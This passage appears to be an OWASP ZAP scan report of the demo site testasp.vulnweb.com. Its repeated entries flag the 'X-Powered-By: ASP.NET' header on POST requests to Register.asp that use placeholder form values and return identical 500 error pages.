<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
